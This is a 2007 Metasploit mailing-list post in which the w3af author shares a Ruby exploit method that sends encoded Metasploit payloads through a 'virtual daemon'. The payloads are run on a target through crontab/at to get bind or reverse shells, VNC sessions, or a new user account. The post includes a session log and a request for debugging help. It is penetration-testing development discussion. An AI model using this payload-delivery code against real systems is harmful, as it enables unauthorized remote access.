Re: VNC payload problems

[andres.riancho at gmail.com (Andres Riancho)]

plugin code:

    def exploit
        # Connect to the vdaemon and send the payload
        vdaemonSock = connect(false, { 'RPORT' => 9091 , 'RHOST' => '
127.0.0.1' })
        # Say hi!
        vdaemonSock.put('<metasploit-w3af-link>')

        remoteIP = vdaemonSock.get_once
        print_status("The remote IP address is: #{remoteIP}")
        print_status("Using remote IP address to create payloads.")

        vdaemonSock.put(payload.encoded.length.to_s.rjust(4))
        vdaemonSock.put(payload.encoded)
        print_status("Sent payload to vdaemon.")

        if ( target.name == 'Windows' )
            response = vdaemonSock.get_once
            print_status("The estimated time to wait for PE transfer is:
#{response} seconds.")
            print_status("Sleeping...")
            sleep( response.to_i )
        end

        # Get how much time to wait
        response = vdaemonSock.get_once
        # wait for the crontab/at to run
        if response.length > 2
            print_status("vdaemon says: #{response}")
        else
            print_status("Going to sleep for #{response} seconds (waiting
for crontab/at to execute payload).")
            sleep( response.to_i )
            print_status("Done waiting!")

            print_status("Starting handler")
            handler
        end
        disconnect
    end

On 9/25/07, Andres Riancho <andres.riancho at gmail.com> wrote:
> Hi list,
>
>     I'm trying to do something really odd with metasploit (so I think this
> is the correct list =). I'm trying to integrate MSF and w3af in order to be
> able to use all MSF payloads while exploiting web applications (sql
> injection, osCommanding, and anything that gets me a remote shell).
>
>     To do that, I coded a metasploit plugin (see code below) and a virtual
> daemon. The virtual daemon listens on port 9091 and receives the msf plugin
> connections, the msf plugin sends the payload to the virtual daemon; when
> the virtual daemon gets the payload, it wraps the payload in an PE file.
> That PE file is sent to the server i REALLY want to exploit using some
> non-important method and then it gets executed. Using this method I have
> been able to use the following payloads successfully:
>         - create "metasploit" user
>         - bind a shell
>         - reverse shell
>
>     The problem I have is with the VNC payloads, they are simply not
> working. This is the log I get when exploiting this:
>
> [*] Started bind handler
> [*] The remote IP address is: 172.16.1.128
> [*] Using remote IP address to create payloads.
> [*] Sent payload to vdaemon.
> [*] The estimated time to wait for PE transfer is: 7.0 seconds.
> [*] Sleeping... [*] Going to sleep for 02 seconds (waiting for crontab/at
> to execute payload).
> [*] Transmitting intermediate stager for over-sized stage...(89 bytes)
> [*] Sending stage (2834 bytes)
> [*] Sleeping before handling stage...
> [*] Done waiting!
> [*] Starting handler
> [*] Uploading DLL (340049 bytes)...
> [*] Upload completed.
> [*] Starting local TCP relay on 127.0.0.1:5900...  Local TCP relay
> started.
> [*] Launched vnciewer in the background.
> [*] VNC Server session 1 opened (172.16.1.1:41780 -> 172.16.1.128:4444)
> [*] Using already established connection.
> [*] VNC connection closed.
> [*] VNC Server session 1 closed.
>
>     As far as I know, the DLL is successfully sent to the remote server
> and it's working ( the MSF courtesy shell pops up in the remote windows ).
> The problem is that the VNC session closes... and I see this on the console:
>
>
> VNC viewer version 3.3.7 - built Mar  8 2007 21:56:52
> Copyright (C) 2002-2003 RealVNC Ltd.
> Copyright (C) 1994-2000 AT&T Laboratories Cambridge.
> See http://www.realvnc.com for information on VNC.
> ReadFromRFBServer: rdr::EndOfStream
>
>    Neither bind and reverse VNC are working. I think that the problem is
> with the TCP relay... any ideas on why this ain't working? How can I debug
> the multistage payload (the .exe on the remote server) ?
>
>
> Cheers,
> --
> Andres Riancho
> http://w3af.sourceforge.net/
> Web Application Attack and Audit Framework




-- 
Andres Riancho
http://w3af.sourceforge.net/
Web Application Attack and Audit Framework
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20070925/cbf3622f/attachment.htm>